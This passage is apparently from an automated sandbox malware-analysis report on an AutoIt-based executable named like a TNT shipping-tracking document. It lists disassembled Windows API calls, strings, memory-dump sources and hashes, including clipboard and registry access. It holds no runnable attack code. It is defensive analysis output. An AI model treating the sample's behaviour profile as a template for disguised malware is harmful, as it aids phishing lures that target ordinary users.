                                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                      • String ID:
                                      • API String ID: 69173610-0
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 004590F2
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                      • GetStockObject.GDI32(00000011), ref: 004592AC
                                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                      • DeleteDC.GDI32(00000000), ref: 004592D6
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                      • GetStockObject.GDI32(00000011), ref: 004593D3
                                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-3360698832
                                      • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                      • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                      • SetCursor.USER32(00000000), ref: 0043075B
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                      • SetCursor.USER32(00000000), ref: 00430773
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                      • SetCursor.USER32(00000000), ref: 0043078B
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                      • SetCursor.USER32(00000000), ref: 004307A3
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                      • SetCursor.USER32(00000000), ref: 004307BB
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                      • SetCursor.USER32(00000000), ref: 004307D3
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                      • SetCursor.USER32(00000000), ref: 004307EB
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                      • SetCursor.USER32(00000000), ref: 00430803
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                      • SetCursor.USER32(00000000), ref: 0043081B
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                      • SetCursor.USER32(00000000), ref: 00430833
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                      • SetCursor.USER32(00000000), ref: 0043084B
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                      • SetCursor.USER32(00000000), ref: 00430863
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                      • SetCursor.USER32(00000000), ref: 0043087B
                                      • SetCursor.USER32(00000000), ref: 00430887
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                      • SetCursor.USER32(00000000), ref: 0043089F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Cursor$Load
                                      • String ID:
                                      • API String ID: 1675784387-0
                                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                      APIs
                                      • GetSysColor.USER32(0000000E), ref: 00430913
                                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                      • GetSysColor.USER32(00000012), ref: 00430933
                                      • SetTextColor.GDI32(?,?), ref: 0043093B
                                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                      • GetSysColor.USER32(0000000F), ref: 00430959
                                      • CreateSolidBrush.GDI32(?), ref: 00430962
                                      • GetSysColor.USER32(00000011), ref: 00430979
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                                      • SetBkColor.GDI32(?,?), ref: 004309A6
                                      • SelectObject.GDI32(?,?), ref: 004309B4
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                                      • GetSysColor.USER32(00000011), ref: 00430A9F
                                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                      • SelectObject.GDI32(?,?), ref: 00430AD0
                                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                                      • SelectObject.GDI32(?,?), ref: 00430AE3
                                      • DeleteObject.GDI32(?), ref: 00430AE9
                                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1582027408-0
                                      • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                      • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CloseConnectCreateRegistry
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 3217815495-966354055
                                      • Opcode ID: 36a75955d77b631ca06ebe7b7b574e171c88fba640f356bc86dd706e18d111e2
                                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                      • Opcode Fuzzy Hash: 36a75955d77b631ca06ebe7b7b574e171c88fba640f356bc86dd706e18d111e2
                                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004566AE
                                      • GetDesktopWindow.USER32 ref: 004566C3
                                      • GetWindowRect.USER32(00000000), ref: 004566CA
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                      • DestroyWindow.USER32(?), ref: 00456746
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                      • IsWindowVisible.USER32(?), ref: 0045682C
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                      • GetWindowRect.USER32(?,?), ref: 00456873
                                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                      • CopyRect.USER32(?,?), ref: 004568BE
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                      • String ID: ($,$tooltips_class32
                                      • API String ID: 225202481-3320066284
                                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                      APIs
                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                      • CloseClipboard.USER32 ref: 0046DD0D
                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                      • CloseClipboard.USER32 ref: 0046DD41
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                      • CloseClipboard.USER32 ref: 0046DD99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                      • String ID:
                                      • API String ID: 15083398-0
                                      • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                      • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                      • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                      • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetWindowRect.USER32(?,?), ref: 00471CF7
                                      • GetClientRect.USER32(?,?), ref: 00471D05
                                      • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                      • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                      • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                      • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                      • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                      • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                      • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                      • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                      • GetClientRect.USER32(?,?), ref: 00471E8A
                                      • GetStockObject.GDI32(00000011), ref: 00471EA6
                                      • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                      • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                      • String ID: @$AutoIt v3 GUI
                                      • API String ID: 867697134-3359773793
                                      • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                      • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                      • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                      • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Similarity
                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 1503153545-1459072770
                                      • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                      • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                      • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                      • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __wcsicoll$__wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                      • API String ID: 790654849-32604322
                                      • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                      • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                      • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                      • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                      • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                      APIs
                                        • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                      • _fseek.LIBCMT ref: 00452B3B
                                      • __wsplitpath.LIBCMT ref: 00452B9B
                                      • _wcscpy.LIBCMT ref: 00452BB0
                                      • _wcscat.LIBCMT ref: 00452BC5
                                      • __wsplitpath.LIBCMT ref: 00452BEF
                                      • _wcscat.LIBCMT ref: 00452C07
                                      • _wcscat.LIBCMT ref: 00452C1C
                                      • __fread_nolock.LIBCMT ref: 00452C53
                                      • __fread_nolock.LIBCMT ref: 00452C64
                                      • __fread_nolock.LIBCMT ref: 00452C83
                                      • __fread_nolock.LIBCMT ref: 00452C94
                                      • __fread_nolock.LIBCMT ref: 00452CB5
                                      • __fread_nolock.LIBCMT ref: 00452CC6
                                      • __fread_nolock.LIBCMT ref: 00452CD7
                                      • __fread_nolock.LIBCMT ref: 00452CE8
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                      • __fread_nolock.LIBCMT ref: 00452D78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                      • String ID:
                                      • API String ID: 2054058615-0
                                      • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                      • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                      • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                      • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window
                                      • String ID: 0
                                      • API String ID: 2353593579-4108050209
                                      • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                      • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
